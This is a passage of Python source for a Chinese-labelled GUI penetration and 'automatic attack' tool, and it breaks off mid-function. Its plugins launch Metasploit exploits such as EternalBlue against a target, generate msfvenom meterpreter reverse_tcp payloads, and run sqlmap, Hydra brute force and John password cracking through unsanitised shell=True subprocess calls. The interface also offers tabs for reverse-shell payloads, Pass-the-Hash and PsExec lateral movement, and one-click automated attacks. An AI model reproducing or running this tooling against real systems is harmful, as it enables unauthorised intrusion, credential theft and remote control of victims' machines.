def load_plugins(self):
self.plugins['metasploit'] = MetasploitPlugin()
self.plugins['nmap'] = NmapPlugin()
self.plugins['burp'] = BurpPlugin()
self.plugins['sqlmap'] = SQLMapPlugin()
self.plugins['hydra'] = HydraPlugin()
self.plugins['john'] = JohnTheRipperPlugin()
self.plugins['wireshark'] = WiresharkPlugin()
self.plugins['nessus'] = NessusPlugin()
def register_plugin(self, name, plugin_class):
self.plugins[name] = plugin_class
def execute_plugin(self, name, *args):
if name in self.plugins:
return self.plugins[name].execute(*args)
else:
return f"插件 {name} 未找到"
class MetasploitPlugin:
def exploit_via_msf(self, target, exploit):
try:
command = f"msfconsole -q -x 'use {exploit}; set RHOST {target}; run'"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=30)
return f"Metasploit exploit {exploit} 执行完成: {result.stdout[:200]}..."
except Exception as e:
return f"Metasploit exploit: {exploit} against {target} (模拟执行)"
def generate_msf_payload(self, lhost, lport):
try:
command = f"msfvenom -p windows/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe -o payload_{lport}.exe"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=30)
if result.returncode == 0:
return f"Payload生成成功: payload_{lport}.exe"
else:
return f"msfvenom -p windows/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe > payload_{lport}.exe"
except:
return f"msfvenom -p windows/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe > payload_{lport}.exe"
def execute(self, *args):
try:
if len(args) > 0:
target = args[0]
exploits = [
"exploit/windows/smb/ms17_010_eternalblue",
"exploit/multi/handler",
"auxiliary/scanner/portscan/tcp"
]
results = []
for exploit in exploits:
result = self.exploit_via_msf(target, exploit)
results.append(result)
return "Metasploit插件执行完成:\n" + "\n".join(results)
else:
return "Metasploit插件: 提供目标参数以执行漏洞利用"
except Exception as e:
return f"Metasploit插件执行失败: {str(e)}"
class NmapPlugin:
def execute(self, *args):
try:
if len(args) > 0:
target = args[0]
command = f"nmap -sS -sV -O {target}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=60)
if result.returncode == 0:
return f"Nmap扫描完成:\n{result.stdout}"
else:
return f"nmap -sS -sV -O {target} (模拟扫描)"
else:
return "Nmap插件: 提供目标参数以执行扫描"
except Exception as e:
return f"Nmap插件执行失败: {str(e)}"
class BurpPlugin:
def execute(self, *args):
try:
if len(args) > 0:
target = args[0]
return f"Burp Suite扫描目标: {target}\n模拟发送请求到Burp代理进行安全测试"
else:
return "Burp插件: 提供目标URL以进行安全扫描"
except Exception as e:
return f"Burp插件执行失败: {str(e)}"
class SQLMapPlugin:
def execute(self, *args):
try:
if len(args) > 0:
target = args[0]
command = f"sqlmap -u {target} --batch --level=3 --risk=2"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=120)
if result.returncode == 0:
return f"SQLMap扫描完成:\n{result.stdout[:500]}..."
else:
return f"sqlmap -u {target} --batch --level=3 --risk=2 (模拟SQL注入检测)"
else:
return "SQLMap插件: 提供目标URL以检测SQL注入"
except Exception as e:
return f"SQLMap插件执行失败: {str(e)}"
class HydraPlugin:
def execute(self, *args):
try:
if len(args) > 1:
target = args[0]
service = args[1]
command = f"hydra -L users.txt -P passwords.txt {target} {service}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=180)
if result.returncode == 0:
return f"Hydra暴力破解完成:\n{result.stdout}"
else:
return f"hydra -L users.txt -P passwords.txt {target} {service} (模拟暴力破解)"
else:
return "Hydra插件: 提供目标和服务类型以进行暴力破解"
except Exception as e:
return f"Hydra插件执行失败: {str(e)}"
class JohnTheRipperPlugin:
def execute(self, *args):
try:
if len(args) > 0:
hash_file = args[0]
command = f"john {hash_file}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=300)
if result.returncode == 0:
return f"John破解完成:\n{result.stdout}"
else:
return f"john {hash_file} (模拟密码破解)"
else:
return "John插件: 提供哈希文件以进行密码破解"
except Exception as e:
return f"John插件执行失败: {str(e)}"
class WiresharkPlugin:
def execute(self, *args):
try:
if len(args) > 0:
interface = args[0]
return f"Wireshark开始捕获接口 {interface} 的网络流量\n使用过滤器进行协议分析"
else:
return "Wireshark插件: 提供网络接口以进行流量分析"
except Exception as e:
return f"Wireshark插件执行失败: {str(e)}"
class NessusPlugin:
def execute(self, *args):
try:
if len(args) > 0:
target = args[0]
return f"Nessus漏洞扫描目标: {target}\n执行全面安全评估和漏洞检测"
else:
return "Nessus插件: 提供目标以进行漏洞扫描"
except Exception as e:
return f"Nessus插件执行失败: {str(e)}"
class ModernRedTeamGUI:
def __init__(self, root):
self.root = root
self.root.title("🔍 麒麟渗透测试工具 v10.0")
self.root.geometry("1400x900")
self.root.configure(bg='#1e1e1e')
self.tool = StandaloneRedTeamTool()
self.advanced_exp = AdvancedExploitation()
self.lateral_movement = LateralMovement()
self.priv_esc = PrivilegeEscalation()
self.ai_attack = AIDrivenAttack()
self.advanced_web = AdvancedWebAttacks()
self.api_testing = APISecurityTesting()
self.plugin_system = PluginSystem()
self.scanning = False
self.auto_attacking = False
self.vulnerabilities = []
self.attack_results = []
self.setup_modern_ui()
def setup_modern_ui(self):
main_container = tk.Frame(self.root, bg='#1e1e1e')
main_container.pack(fill='both', expand=True, padx=2, pady=2)
self.create_header(main_container)
self.notebook = ttk.Notebook(main_container)
self.notebook.pack(fill='both', expand=True, padx=10, pady=(0, 10))
self.setup_dashboard_tab()
self.setup_scan_tab()
self.setup_web_tab()
self.setup_vuln_tab()
self.setup_attack_tab()
self.setup_advanced_tab()
self.setup_lateral_tab()
self.setup_privilege_tab()
self.setup_api_tab()
self.setup_plugins_tab()
self.setup_results_tab()
self.setup_auto_attack_tab()
self.create_status_bar(main_container)
def create_header(self, parent):
header_frame = tk.Frame(parent, bg='#2d2d30', height=80)
header_frame.pack(fill='x', padx=10, pady=10)
header_frame.pack_propagate(False)
title_frame = tk.Frame(header_frame, bg='#2d2d30')
title_frame.pack(side='left', padx=20)
title_label = tk.Label(title_frame, text="🔍 麒麟渗透测试工具 v10.0",
font=('Segoe UI', 18, 'bold'),
bg='#2d2d30', fg='#ffffff')
title_label.pack(anchor='w')
subtitle_label = tk.Label(title_frame, text="自动化安全评估与攻击平台 ——邹云松",
font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc')
subtitle_label.pack(anchor='w')
quick_actions = tk.Frame(header_frame, bg='#2d2d30')
quick_actions.pack(side='right', padx=20)
tk.Button(quick_actions, text="🚀 AI自动攻击",
bg='#ff4444', fg='white', font=('Segoe UI', 9, 'bold'),
relief='flat', padx=15, pady=5,
command=self.start_ai_attack).pack(side='left', padx=5)
tk.Button(quick_actions, text="📊 生成报告",
bg='#0e639c', fg='white', font=('Segoe UI', 9, 'bold'),
relief='flat', padx=15, pady=5,
command=self.export_results).pack(side='left', padx=5)
def create_status_bar(self, parent):
status_frame = tk.Frame(parent, bg='#2d2d30', height=30)
status_frame.pack(fill='x', padx=10, pady=5)
status_frame.pack_propagate(False)
self.status_label = tk.Label(status_frame, text="🟢 就绪",
font=('Segoe UI', 9),
bg='#2d2d30', fg='#00ff00')
self.status_label.pack(side='left', padx=10)
self.scan_status = tk.Label(status_frame, text="扫描: 0/0",
font=('Segoe UI', 9),
bg='#2d2d30', fg='#cccccc')
self.scan_status.pack(side='right', padx=10)
def setup_dashboard_tab(self):
self.dashboard_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.dashboard_frame, text="🏠 仪表盘")
self.create_dashboard_cards()
def create_dashboard_cards(self):
stats_container = tk.Frame(self.dashboard_frame, bg='#2d2d30')
stats_container.pack(fill='x', padx=20, pady=20)
self.stats_data = [
{"icon": "🔍", "title": "扫描目标", "value": "0", "color": "#0078d4"},
{"icon": "⚠️", "title": "发现漏洞", "value": "0", "color": "#d83b01"},
{"icon": "🔒", "title": "安全服务", "value": "0", "color": "#107c10"},
{"icon": "📊", "title": "扫描次数", "value": "0", "color": "#8661c5"}
]
self.stat_cards = []
for i, stat in enumerate(self.stats_data):
card = self.create_stat_card(stats_container, stat)
card.grid(row=0, column=i, padx=10, pady=10, sticky='nsew')
stats_container.columnconfigure(i, weight=1)
quick_start_frame = tk.Frame(self.dashboard_frame, bg='#2d2d30')
quick_start_frame.pack(fill='both', expand=True, padx=20, pady=20)
left_frame = tk.Frame(quick_start_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', expand=True, padx=(0, 10))
quick_ops_label = tk.Label(left_frame, text="🚀 快速开始",
font=('Segoe UI', 14, 'bold'),
bg='#2d2d30', fg='white')
quick_ops_label.pack(anchor='w', pady=(0, 15))
quick_actions = [
("🌐 Web漏洞扫描", self.quick_web_scan),
("🔧 服务漏洞检测", self.quick_service_scan),
("🎯 生成攻击载荷", self.quick_payload),
("📋 查看扫描结果", self.show_results)
]
for text, command in quick_actions:
btn = tk.Button(left_frame, text=text,
bg='#0e639c', fg='white', font=('Segoe UI', 10),
relief='flat', pady=8,
command=command)
btn.pack(fill='x', pady=5)
right_frame = tk.Frame(quick_start_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=(10, 0))
recent_label = tk.Label(right_frame, text="📝 最近活动",
font=('Segoe UI', 14, 'bold'),
bg='#2d2d30', fg='white')
recent_label.pack(anchor='w', pady=(0, 15))
self.recent_activity = scrolledtext.ScrolledText(right_frame, width=50, height=15,
bg='#1e1e1e', fg='#cccccc',
font=('Consolas', 9),
insertbackground='white')
self.recent_activity.pack(fill='both', expand=True)
self.recent_activity.insert('1.0', "🕐 暂无活动记录\n\n")
self.recent_activity.config(state='disabled')
def create_stat_card(self, parent, data):
card = tk.Frame(parent, bg='#3c3c3c', relief='raised', bd=1)
icon_label = tk.Label(card, text=data["icon"], font=('Segoe UI', 24),
bg='#3c3c3c', fg=data["color"])
icon_label.pack(anchor='nw', padx=15, pady=15)
title_label = tk.Label(card, text=data["title"], font=('Segoe UI', 11),
bg='#3c3c3c', fg='#cccccc')
title_label.pack(anchor='nw', padx=15, pady=(0, 5))
value_label = tk.Label(card, text=data["value"], font=('Segoe UI', 20, 'bold'),
bg='#3c3c3c', fg='white')
value_label.pack(anchor='nw', padx=15, pady=(0, 15))
return card
def setup_scan_tab(self):
self.scan_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.scan_frame, text="🔍 信息收集")
left_frame = tk.Frame(self.scan_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.scan_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_scan_control_panel(left_frame)
self.create_scan_results_panel(right_frame)
def create_scan_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x', pady=(0, 20))
title_label = tk.Label(control_frame, text="🎯 扫描配置",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
input_group = tk.Frame(control_frame, bg='#2d2d30')
input_group.pack(fill='x', pady=10)
tk.Label(input_group, text="🎯 目标地址:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.target_entry = tk.Entry(input_group, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.target_entry.pack(fill='x', pady=5)
self.target_entry.insert(0, "127.0.0.1")
tk.Label(input_group, text="📊 扫描类型:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.scan_type = ttk.Combobox(input_group, values=["快速扫描", "全面扫描", "端口扫描", "服务识别"])
self.scan_type.set("快速扫描")
self.scan_type.pack(fill='x', pady=5)
tk.Label(input_group, text="🔢 端口范围:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.ports_entry = tk.Entry(input_group, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.ports_entry.insert(0, "1-1000")
self.ports_entry.pack(fill='x', pady=5)
button_group = tk.Frame(control_frame, bg='#2d2d30')
button_group.pack(fill='x', pady=20)
self.scan_btn = tk.Button(button_group, text="🚀 开始扫描",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_scan)
self.scan_btn.pack(fill='x', pady=5)
self.stop_btn = tk.Button(button_group, text="⏹️ 停止扫描",
bg='#0e639c', fg='white', font=('Segoe UI', 10),
relief='flat', pady=8,
command=self.stop_scan, state='disabled')
self.stop_btn.pack(fill='x', pady=5)
self.progress = ttk.Progressbar(control_frame, mode='indeterminate')
self.progress.pack(fill='x', pady=10)
def create_scan_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📊 扫描结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.scan_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.scan_result.pack(fill='both', expand=True)
def setup_web_tab(self):
self.web_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.web_frame, text="🌐 Web漏洞扫描")
left_frame = tk.Frame(self.web_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.web_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_web_control_panel(left_frame)
self.create_web_results_panel(right_frame)
def create_web_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🕷️ Web扫描配置",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🌐 目标URL:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.url_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.url_entry.pack(fill='x', pady=5)
self.url_entry.insert(0, "http://127.0.0.1")
tk.Label(control_frame, text="🔧 扫描模块:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.web_scan_type = ttk.Combobox(control_frame,
values=["全面扫描", "路径枚举", "SQL注入", "XSS检测", "文件包含"])
self.web_scan_type.set("全面扫描")
self.web_scan_type.pack(fill='x', pady=5)
self.web_scan_btn = tk.Button(control_frame, text="🚀 开始Web扫描",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_web_scan)
self.web_scan_btn.pack(fill='x', pady=20)
def create_web_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 Web扫描结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.web_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.web_result.pack(fill='both', expand=True)
def setup_vuln_tab(self):
self.vuln_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.vuln_frame, text="⚠️ 漏洞检测")
left_frame = tk.Frame(self.vuln_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.vuln_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_vuln_control_panel(left_frame)
self.create_vuln_results_panel(right_frame)
def create_vuln_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🔍 漏洞检测配置",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🎯 目标地址:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.vuln_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.vuln_target_entry.pack(fill='x', pady=5)
self.vuln_target_entry.insert(0, "127.0.0.1")
tk.Label(control_frame, text="🛡️ 检测类型:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.vuln_type = ttk.Combobox(control_frame,
values=["全面漏洞扫描", "FTP检测", "SSH检测", "Redis检测", "MySQL检测"])
self.vuln_type.set("全面漏洞扫描")
self.vuln_type.pack(fill='x', pady=5)
self.vuln_scan_btn = tk.Button(control_frame, text="🚀 开始漏洞检测",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_vuln_scan)
self.vuln_scan_btn.pack(fill='x', pady=20)
def create_vuln_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 漏洞检测结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.vuln_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.vuln_result.pack(fill='both', expand=True)
def setup_attack_tab(self):
self.attack_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.attack_frame, text="⚔️ 攻击工具")
left_frame = tk.Frame(self.attack_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.attack_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_attack_control_panel(left_frame)
self.create_attack_results_panel(right_frame)
def create_attack_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🎯 Payload生成",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="📡 监听IP:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.lhost_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.lhost_entry.insert(0, "192.168.1.100")
self.lhost_entry.pack(fill='x', pady=5)
tk.Label(control_frame, text="🔊 监听端口:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.lport_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.lport_entry.insert(0, "4444")
self.lport_entry.pack(fill='x', pady=5)
tk.Label(control_frame, text="💻 Payload类型:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.payload_type = ttk.Combobox(control_frame,
values=["Python", "Bash", "Netcat", "PowerShell", "PHP"])
self.payload_type.set("Python")
self.payload_type.pack(fill='x', pady=5)
button_group = tk.Frame(control_frame, bg='#2d2d30')
button_group.pack(fill='x', pady=20)
self.generate_btn = tk.Button(button_group, text="🚀 生成Payload",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.generate_payload)
self.generate_btn.pack(fill='x', pady=5)
self.copy_btn = tk.Button(button_group, text="📋 复制到剪贴板",
bg='#0e639c', fg='white', font=('Segoe UI', 10),
relief='flat', pady=8,
command=self.copy_payload)
self.copy_btn.pack(fill='x', pady=5)
def create_attack_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📜 生成的Payload",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.payload_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.payload_result.pack(fill='both', expand=True)
def setup_results_tab(self):
self.results_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.results_frame, text="📊 扫描结果")
main_frame = tk.Frame(self.results_frame, bg='#2d2d30')
main_frame.pack(fill='both', expand=True, padx=10, pady=10)
title_label = tk.Label(main_frame, text="📋 发现的漏洞",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
list_frame = tk.Frame(main_frame, bg='#2d2d30')
list_frame.pack(fill='both', expand=True, pady=10)
list_container = tk.Frame(list_frame, bg='#1e1e1e', relief='sunken', bd=1)
list_container.pack(fill='both', expand=True)
self.vuln_listbox = tk.Listbox(list_container,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
selectbackground='#0e639c',
selectforeground='white',
borderwidth=0,
highlightthickness=0)
scrollbar = tk.Scrollbar(list_container, orient='vertical', bg='#3c3c3c')
self.vuln_listbox.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=self.vuln_listbox.yview)
self.vuln_listbox.pack(side='left', fill='both', expand=True)
scrollbar.pack(side='right', fill='y')
button_frame = tk.Frame(main_frame, bg='#2d2d30')
button_frame.pack(fill='x', pady=10)
tk.Button(button_frame, text="📄 导出结果",
bg='#0e639c', fg='white', font=('Segoe UI', 9),
relief='flat', padx=15, pady=5,
command=self.export_results).pack(side='left', padx=5)
tk.Button(button_frame, text="🗑️ 清空结果",
bg='#0e639c', fg='white', font=('Segoe UI', 9),
relief='flat', padx=15, pady=5,
command=self.clear_results).pack(side='left', padx=5)
tk.Button(button_frame, text="💾 保存项目",
bg='#0e639c', fg='white', font=('Segoe UI', 9),
relief='flat', padx=15, pady=5,
command=self.save_project).pack(side='left', padx=5)
tk.Button(button_frame, text="📂 加载项目",
bg='#0e639c', fg='white', font=('Segoe UI', 9),
relief='flat', padx=15, pady=5,
command=self.load_project).pack(side='left', padx=5)
def setup_auto_attack_tab(self):
self.auto_attack_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.auto_attack_frame, text="🤖 自动化攻击")
main_frame = tk.Frame(self.auto_attack_frame, bg='#2d2d30')
main_frame.pack(fill='both', expand=True, padx=10, pady=10)
title_label = tk.Label(main_frame, text="🤖 自动化攻击控制台",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
control_frame = tk.Frame(main_frame, bg='#2d2d30')
control_frame.pack(fill='x', pady=(0, 15))
tk.Label(control_frame, text="🎯 目标地址:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.auto_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10), width=50)
self.auto_target_entry.pack(fill='x', pady=5)
self.auto_target_entry.insert(0, "127.0.0.1")
tk.Label(control_frame, text="⚔️ 攻击模式:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.attack_mode = ttk.Combobox(control_frame,
values=["全自动攻击", "仅检测不攻击", "智能攻击模式"])
self.attack_mode.set("全自动攻击")
self.attack_mode.pack(fill='x', pady=5)
button_frame = tk.Frame(control_frame, bg='#2d2d30')
button_frame.pack(fill='x', pady=20)
self.auto_attack_btn = tk.Button(button_frame, text="🚀 开始自动攻击",
bg='#ff4444', fg='white', font=('Segoe UI', 12, 'bold'),
relief='flat', pady=12,
command=self.start_auto_attack)
self.auto_attack_btn.pack(fill='x', pady=5)
self.stop_auto_btn = tk.Button(button_frame, text="⏹️ 停止攻击",
bg='#0e639c', fg='white', font=('Segoe UI', 10),
relief='flat', pady=8,
command=self.stop_auto_attack, state='disabled')
self.stop_auto_btn.pack(fill='x', pady=5)
results_frame = tk.Frame(main_frame, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
tk.Label(results_frame, text="📋 攻击结果实时展示",
font=('Segoe UI', 14, 'bold'),
bg='#2d2d30', fg='white').pack(anchor='w', pady=(0, 10))
self.attack_result_display = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.attack_result_display.pack(fill='both', expand=True)
def setup_advanced_tab(self):
self.advanced_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.advanced_frame, text="🔥 高级漏洞利用")
left_frame = tk.Frame(self.advanced_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.advanced_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_advanced_control_panel(left_frame)
self.create_advanced_results_panel(right_frame)
def create_advanced_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🔥 高级漏洞利用",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🎯 目标地址:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.advanced_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.advanced_target_entry.pack(fill='x', pady=5)
self.advanced_target_entry.insert(0, "http://127.0.0.1")
tk.Label(control_frame, text="⚔️ 攻击类型:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.advanced_attack_type = ttk.Combobox(control_frame,
values=["Struts2漏洞", "WebLogic反序列化",
"Shiro反序列化", "Log4Shell",
"SSRF攻击", "XXE攻击",
"反序列化攻击", "GraphQL注入", "JWT攻击"])
self.advanced_attack_type.set("Struts2漏洞")
self.advanced_attack_type.pack(fill='x', pady=5)
self.advanced_attack_btn = tk.Button(control_frame, text="🚀 执行高级攻击",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_advanced_attack)
self.advanced_attack_btn.pack(fill='x', pady=20)
def create_advanced_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 高级攻击结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.advanced_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.advanced_result.pack(fill='both', expand=True)
def setup_lateral_tab(self):
self.lateral_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.lateral_frame, text="🔄 横向移动")
left_frame = tk.Frame(self.lateral_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.lateral_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_lateral_control_panel(left_frame)
self.create_lateral_results_panel(right_frame)
def create_lateral_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🔄 横向移动攻击",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🎯 目标主机:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.lateral_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.lateral_target_entry.pack(fill='x', pady=5)
self.lateral_target_entry.insert(0, "192.168.1.100")
tk.Label(control_frame, text="👤 用户名:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.lateral_user_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.lateral_user_entry.pack(fill='x', pady=5)
self.lateral_user_entry.insert(0, "Administrator")
tk.Label(control_frame, text="🔑 密码/Hash:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.lateral_pass_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.lateral_pass_entry.pack(fill='x', pady=5)
self.lateral_pass_entry.insert(0, "Password123!")
tk.Label(control_frame, text="🛠️ 移动技术:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.lateral_tech = ttk.Combobox(control_frame,
values=["PsExec", "WMI执行", "SMB共享", "Pass-the-Hash", "RDP劫持", "DCOM执行"])
self.lateral_tech.set("PsExec")
self.lateral_tech.pack(fill='x', pady=5)
self.lateral_attack_btn = tk.Button(control_frame, text="🚀 执行横向移动",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_lateral_attack)
self.lateral_attack_btn.pack(fill='x', pady=20)
def create_lateral_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 横向移动结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
